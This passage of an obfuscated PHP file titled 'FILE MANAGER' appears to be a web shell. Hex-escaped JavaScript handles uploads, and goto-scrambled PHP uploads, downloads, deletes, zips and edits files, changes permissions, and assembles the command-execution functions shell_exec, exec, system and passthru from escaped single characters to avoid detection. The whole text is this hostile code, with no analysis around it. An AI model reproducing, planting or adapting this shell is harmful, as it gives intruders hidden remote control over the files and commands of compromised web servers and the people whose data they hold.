40\40\x20\x20\x20\x20\40\x20\40\40\40\40\40\x76\x61\162\40\x78\150\162\40\75\40\156\x65\167\40\x58\115\x4c\110\x74\x74\160\x52\145\161\x75\145\x73\164\x28\x29\x3b\xd\xa\x20\40\x20\40\x20\40\40\x20\x20\40\x20\x20\40\x20\x20\40\170\x68\x72\56\157\160\x65\x6e\x28\42\x50\x4f\x53\x54\42\x2c\40\163\x63\162\x69\x70\x74\x55\162\x6c\40\x2b\x20\42\77\165\160\154\x6f\141\x64\x5f\146\151\x6c\145\x3d\x22\x20\53\40\145\156\x63\157\144\x65\x55\x52\111\103\x6f\x6d\160\157\156\145\x6e\x74\50\x63\x75\x72\x72\x65\156\164\x44\151\162\x29\x20\x2b\40\42\x26\x6e\141\x6d\x65\75\42\x20\x2b\40\x65\156\143\x6f\x64\x65\125\122\111\103\x6f\x6d\160\x6f\156\x65\x6e\x74\50\x66\x69\x6c\145\x6e\x61\155\145\x29\x2c\40\164\x72\165\145\51\73\xd\12\x20\x20\x20\40\40\40\x20\40\40\40\x20\x20\40\x20\x20\40\15\xa\x20\x20\40\x20\x20\40\40\40\x20\40\x20\40\x20\x20\40\x20\130\x4d\114\110\164\x74\160\122\145\x71\x75\x65\163\164\56\160\x72\x6f\x74\157\x74\171\160\x65\56\155\171\x53\145\x6e\x64\101\163\102\x69\x6e\141\162\x79\40\75\40\146\x75\x6e\x63\164\x69\x6f\156\x28\x74\145\x78\x74\x29\x20\173\15\xa\40\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\40\40\40\x20\40\40\x76\141\162\x20\x64\141\164\x61\x20\75\x20\x6e\145\167\40\x41\x72\x72\x61\x79\102\x75\146\146\x65\162\50\x74\145\170\x74\x2e\x6c\x65\x6e\x67\164\150\x29\73\15\12\x20\x20\40\40\40\x20\40\40\x20\x20\x20\40\x20\40\x20\40\x20\40\40\40\166\x61\x72\40\x75\151\70\x61\40\x3d\40\x6e\x65\x77\x20\x55\151\x6e\x74\x38\101\162\162\141\171\50\x64\x61\x74\x61\x2c\40\60\51\x3b\15\xa\x20\40\40\x20\40\40\x20\40\x20\40\40\40\x20\x20\40\x20\40\x20\x20\40\x66\x6f\162\x20\x28\x76\x61\x72\40\x69\x20\x3d\x20\60\73\x20\151\x20\x3c\x20\164\x65\170\164\x2e\154\145\x6e\147\164\150\x3b\x20\151\x2b\x2b\51\x20\173\xd\xa\x20\x20\x20\40\x20\40\x20\40\x20\40\x20\40\x20\40\40\40\40\40\40\40\40\x20\40\x20\165\151\x38\141\133\151\135\40\75\x20\50\164\x65\x78\164\56\143\x68\x61\x72\x43\157\x64\x65\101\x74\50\151\51\40\46\x20\x30\x78\x66\146\51\x3b\15\12\x20\x20\x20\40\x20\x20\40\40\x20\40\40\40\x20\40\x20\40\40\x20\40\40\175\15\xa\40\40\40\x20\x20\40\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\x20\40\40\xd\12\40\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\40\40\x20\40\x20\x20\151\x66\40\x28\x74\x79\x70\145\157\146\x20\167\151\156\144\x6f\167\56\x42\x6c\x6f\x62\x20\x3d\x3d\x20\42\x66\x75\156\143\x74\x69\157\x6e\42\x29\40\x7b\xd\xa\40\40\40\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\x20\x76\141\162\x20\x62\154\157\x62\40\75\x20\156\x65\x77\40\102\154\157\x62\50\x5b\144\141\x74\x61\135\x29\73\xd\xa\40\40\x20\x20\x20\x20\40\40\40\x20\40\40\40\x20\40\x20\40\40\x20\x20\175\40\x65\x6c\163\145\40\173\xd\12\x20\40\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\x20\166\x61\162\x20\142\x62\x20\75\x20\x6e\145\167\40\x28\x77\x69\x6e\144\x6f\x77\x2e\115\157\x7a\x42\154\x6f\142\102\x75\151\x6c\144\x65\x72\40\174\174\40\x77\x69\156\144\157\x77\56\127\x65\142\x4b\x69\164\102\x6c\157\142\x42\165\x69\154\x64\145\162\x20\x7c\x7c\x20\167\x69\156\x64\157\167\56\102\x6c\x6f\142\x42\x75\151\x6c\x64\x65\162\51\x28\51\x3b\xd\xa\40\40\x20\40\x20\40\x20\40\40\40\40\x20\40\40\x20\40\x20\40\x20\40\40\40\40\40\142\x62\x2e\x61\x70\x70\x65\156\x64\50\144\x61\164\x61\x29\x3b\15\12\40\x20\x20\40\x20\40\40\40\x20\40\40\x20\x20\40\40\x20\40\40\40\40\40\40\40\40\x76\x61\x72\x20\x62\154\157\142\40\x3d\x20\142\x62\x2e\x67\145\164\x42\x6c\157\142\50\51\73\xd\xa\x20\40\x20\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x7d\xd\12\40\40\40\40\x20\40\40\40\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\xd\12\x20\x20\40\40\40\40\x20\x20\x20\40\40\40\x20\40\40\40\40\x20\x20\40\164\x68\151\x73\56\x73\x65\x6e\144\50\x62\154\157\x62\51\x3b\xd\12\40\40\40\40\40\x20\40\x20\x20\40\40\40\x20\40\x20\x20\x7d\xd\xa\x20\x20\x20\40\40\40\40\x20\40\x20\x20\40\40\x20\x20\40\xd\12\40\x20\x20\40\40\40\40\x20\40\x20\x20\x20\x20\40\40\x20\x78\x68\162\x2e\x6f\156\162\145\141\144\171\163\x74\x61\164\x65\143\150\141\x6e\147\145\x20\75\40\146\x75\156\x63\164\151\157\x6e\x28\x29\x20\173\15\xa\40\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\x20\x20\40\40\x69\x66\x20\50\x78\x68\162\x2e\x72\145\141\x64\171\123\164\141\x74\145\40\75\75\40\x34\x29\x20\x7b\15\xa\x20\x20\40\40\40\40\x20\x20\x20\40\40\x20\x20\40\40\40\40\40\40\40\40\40\x20\x20\x69\146\x20\50\x78\150\162\56\163\x74\x61\x74\x75\x73\40\x3d\75\x20\x32\60\60\51\x20\x7b\xd\12\40\x20\40\40\40\40\x20\40\x20\40\x20\40\x20\x20\40\x20\40\40\40\x20\x20\x20\40\40\x20\x20\x20\40\x73\x74\141\x74\x75\163\x53\x70\141\x6e\x2e\164\x65\x78\164\103\x6f\156\x74\x65\156\164\x20\x3d\40\42\106\151\154\x65\40\42\40\x2b\x20\x66\151\154\145\x6e\x61\x6d\x65\40\53\x20\x22\40\x75\x70\154\x6f\x61\144\145\144\x20\163\165\x63\x63\145\x73\x73\x66\x75\x6c\154\171\41\42\73\xd\12\x20\40\x20\40\40\x20\40\40\40\40\x20\40\40\x20\x20\40\40\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\x73\x74\141\164\x75\163\123\160\x61\156\56\163\164\x79\154\145\x2e\x63\157\154\x6f\162\x20\x3d\40\x22\43\x32\x32\x63\65\65\145\42\x3b\xd\xa\40\x20\x20\x20\x20\40\40\x20\40\40\x20\40\x20\x20\40\40\x20\40\40\40\40\40\x20\40\x20\40\40\40\x73\x65\164\x54\x69\x6d\145\157\165\164\x28\x66\x75\x6e\x63\164\151\x6f\x6e\x28\51\40\x7b\xd\xa\x20\40\40\x20\40\40\40\x20\40\x20\40\40\40\x20\40\x20\x20\x20\x20\40\40\x20\40\x20\40\x20\x20\x20\40\x20\x20\x20\154\x6f\x63\141\164\x69\157\x6e\x2e\x72\x65\154\x6f\x61\144\50\x29\x3b\15\12\40\x20\40\x20\x20\40\40\x20\40\x20\40\x20\x20\40\40\x20\40\40\x20\40\40\40\40\x20\x20\40\40\40\x7d\54\40\x31\60\60\60\51\x3b\15\xa\40\40\x20\x20\40\40\40\x20\x20\x20\x20\40\40\40\x20\x20\40\40\x20\40\40\x20\x20\40\175\40\x65\x6c\x73\x65\40\173\xd\12\40\x20\40\x20\40\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\163\x74\141\164\165\163\x53\x70\x61\x6e\56\164\x65\x78\x74\x43\157\x6e\x74\145\x6e\164\x20\x3d\40\x22\125\x70\154\157\x61\144\40\146\141\151\154\145\144\x3a\x20\x22\x20\53\x20\x78\x68\162\56\x72\x65\163\x70\157\156\x73\x65\124\x65\170\x74\73\xd\12\x20\40\x20\40\x20\40\40\40\x20\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\40\x20\40\40\x20\40\40\163\x74\141\164\x75\x73\123\160\141\156\56\163\x74\x79\154\145\56\143\157\154\157\x72\x20\x3d\x20\42\x72\x65\144\42\x3b\xd\12\x20\x20\40\40\x20\40\x20\40\40\x20\40\x20\40\x20\x20\40\40\x20\40\40\40\x20\x20\x20\175\15\xa\40\40\x20\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\x7d\xd\xa\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\40\40\x20\40\x7d\x3b\15\xa\40\x20\x20\40\40\x20\40\40\40\40\x20\x20\40\x20\40\x20\15\12\x20\x20\x20\x20\40\40\40\x20\40\x20\40\40\40\40\40\40\x78\x68\x72\56\155\171\123\x65\x6e\144\101\x73\102\151\x6e\x61\x72\x79\x28\145\x76\x74\56\x74\141\x72\x67\145\164\x2e\x72\145\x73\165\x6c\164\51\73\xd\xa\x20\x20\40\40\x20\x20\40\x20\40\40\40\x20\x7d\x3b\xd\12\x20\40\40\40\x20\40\40\40\175\xd\12\x20\x20\40\40\40\x20\40\40\xd\xa\40\x20\40\40\40\x20\40\40\146\165\x6e\143\x74\x69\157\x6e\40\x73\171\x6e\x63\x45\144\x69\164\157\162\103\157\x6e\x74\x65\156\164\50\x29\x20\x7b\xd\xa\x20\40\x20\40\40\40\x20\x20\x20\40\40\x20\166\141\x72\x20\144\x69\x73\x70\154\x61\171\40\x3d\40\x64\x6f\143\165\155\145\x6e\x74\x2e\147\x65\164\x45\x6c\145\155\145\x6e\x74\x42\171\111\x64\x28\x27\145\144\151\164\157\x72\x2d\144\x69\163\160\154\141\171\47\51\73\15\12\40\x20\40\40\x20\40\x20\x20\40\x20\x20\40\166\141\x72\x20\150\x69\144\144\145\156\x20\75\40\x64\x6f\143\x75\155\145\x6e\x74\x2e\147\145\x74\105\154\145\x6d\145\156\x74\102\171\x49\x64\50\x27\145\144\151\x74\157\162\x2d\x63\x6f\x6e\164\x65\x6e\x74\47\51\x3b\15\xa\x20\40\40\40\40\40\x20\x20\x20\x20\40\x20\x68\x69\144\144\x65\x6e\x2e\x76\141\x6c\165\x65\40\75\40\x62\164\x6f\141\x28\165\x6e\x65\163\143\141\160\x65\50\145\x6e\x63\157\x64\x65\125\122\x49\x43\x6f\155\x70\157\x6e\x65\x6e\164\50\144\151\x73\x70\x6c\141\x79\56\x76\141\154\x75\145\51\51\51\73\15\12\40\40\x20\40\x20\40\40\40\175\xd\12\x20\x20\x20\x20\74\57\163\143\x72\x69\160\x74\x3e\xd\12\x3c\x2f\x68\145\141\x64\76\15\12\x3c\142\157\x64\x79\x3e\xd\12\74\144\151\x76\40\x63\154\141\163\163\75\42\143\x6f\156\164\141\x69\x6e\145\162\x22\76\xd\12\40\x20\x20\x20\x3c\150\x31\76\106\x49\x4c\105\x20\x4d\101\x4e\x41\x47\105\x52\74\x2f\x68\61\76\15\xa\40\x20\x20\x20\74\160\x20\x63\154\141\163\x73\x3d\x22\x73\165\x62\x74\151\x74\x6c\x65\x22\x3e\x4e\x61\166\x69\147\141\164\x65\40\x61\156\144\40\x6d\x61\156\141\147\145\x20\x79\157\165\162\40\146\151\x6c\145\x73\74\57\160\x3e\15\xa\xd\12\x20\40\40\x20"; goto qnmkE; M8wiY: $uzhX9 = "\104\145\x6c\145\x74\145\x20\146\141\x69\154\145\144\72\40\120\141\x74\150\x20\156\157\x74\x20\x66\157\x75\156\x64"; goto EjGE3; aasYm: echo htmlentities($VW3Pb); goto XxstI; dZI4u: bVxXX: goto RIugT; BcNvE: $uzhX9 = "\104\x65\154\145\164\145\x20\146\x61\151\x6c\x65\144\x3a\40\120\145\162\x6d\151\163\163\x69\x6f\x6e\x20\x64\145\x6e\x69\145\144\40\157\162\x20\146\x69\154\x65\40\151\x6e\x20\x75\x73\145"; goto yMj3q; gQQQc: @mkdir($mTJ38, 0700, true); goto AXZSZ; dG2dq: if (!(is_dir($mTJ38) && is_writable($mTJ38))) { goto DpVgV; } goto pkvWy; auYJE: dCYWm: goto U9tPG; uSkjR: zW1aI: goto Zhite; IKX6E: $rVqjv = fgets($g5ZYS, 4096); goto SYfUu; rAGI0: $uzhX9 = "\104\145\154\x65\x74\145\x20\146\x61\x69\x6c\x65\144\72\x20\x49\x6e\x76\x61\x6c\x69\144\x20\x70\x61\x74\x68"; goto nEgzQ; czYE2: $YKJaG = ''; goto R5syP; SYfUu: if (!(strlen($rVqjv) == 0)) { goto fpw4R; } goto sU5ol; jSJqd: echo "\40\x20\40\40\xd\12\40\40\x20\40"; goto B0LNP; kH1PM: goto dCYWm; goto Db3Sz; hoU0h: Z6Cwe: goto n2Y2w; Hd3GM: $B3Bu3 = ["\x73" . "\x68" . "\x65" . "\x6c" . "\x6c" . "\137" . "\x65" . "\170" . "\145" . "\x63", "\145" . "\x78" . "\145" . "\143", "\x73" . "\x79" . "\x73" . "\x74" . "\x65" . "\155", "\x70" . "\x61" . "\163" . "\163" . "\x74" . "\x68" . "\x72" . "\165"]; goto iAw3A; btKxl: DpVgV: goto fIvv6; Na3VW: sort($DES8d); goto B7RNP; XZP6J: $uzhX9 = "\x44\x6f\x77\x6e\x6c\157\141\144\40\x66\x61\x69\x6c\x65\x64\x3a\40\111\156\x76\141\x6c\x69\144\40\160\x61\x74\x68"; goto sS0v1; z88s7: header("\x43\157\x6e\164\x65\156\164\x2d\x4c\x65\x6e\147\x74\150\72\x20" . filesize($x0vZt)); goto DyxMq; yX9np: echo "\40\40\x20\x20\40\x20\40\40\x3c\144\x69\x76\40\143\x6c\x61\163\x73\75\42\163\145\143\164\x69\x6f\x6e\x22\x3e\xd\12\40\40\40\40\40\40\x20\x20\40\40\x20\x20\74\144\151\x76\40\143\x6c\x61\163\163\75\x22\x73\145\143\164\x69\x6f\156\x2d\164\151\164\x6c\145\x22\x3e\x45\144\x69\x74\x69\x6e\147\x3a\40"; goto xWU67; u5FoX: @chmod($R4MJ2, 0644); goto WNZGN; hCnEm: $uzhX9 = "\x55\x70\154\x6f\x61\x64\40\x65\x72\162\157\162\72\x20" . ($M_PwM[$_FILES["\146\x69\x6c\145\x5f\165\x70\154\157\141\144"]["\145\162\x72\157\162"]] ?? "\125\x6e\x6b\156\x6f\x77\x6e\x20\x65\x72\x72\157\x72"); goto FSGQU; h08bA: goto l8ZKi; goto fbKT2; ijH76: MD3DY: goto Hllvx; wWOx3: if ($D1TWc->open($tDWqL, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { goto fzbpc; } goto YfIl0; Y9zU3: if (!isset($_POST["\x6e\x61\166\151\x67\x61\x74\x65"])) { goto OYdyB; } goto UYTTz; e0TeF: $YKJaG = "\104\151\162\145\143\x74\157\x72\x79\40\x63\150\x61\x6e\147\145\x64\40\163\x75\x63\143\145\x73\x73\x66\x75\154\154\x79"; goto kPHN2; AFFv7: echo "\x20\40\40\x20\40\x20\x20\40\74\57\164\x62\157\x64\171\x3e\xd\12\40\40\40\x20\74\57\164\x61\x62\x6c\x65\76\15\12\x20\x20\40\40\74\x2f\x66\x6f\x72\155\76\15\12\74\57\144\x69\166\76\15\xa\x3c\57\142\x6f\x64\x79\x3e\15\xa\74\x2f\150\164\155\x6c\76"; ?>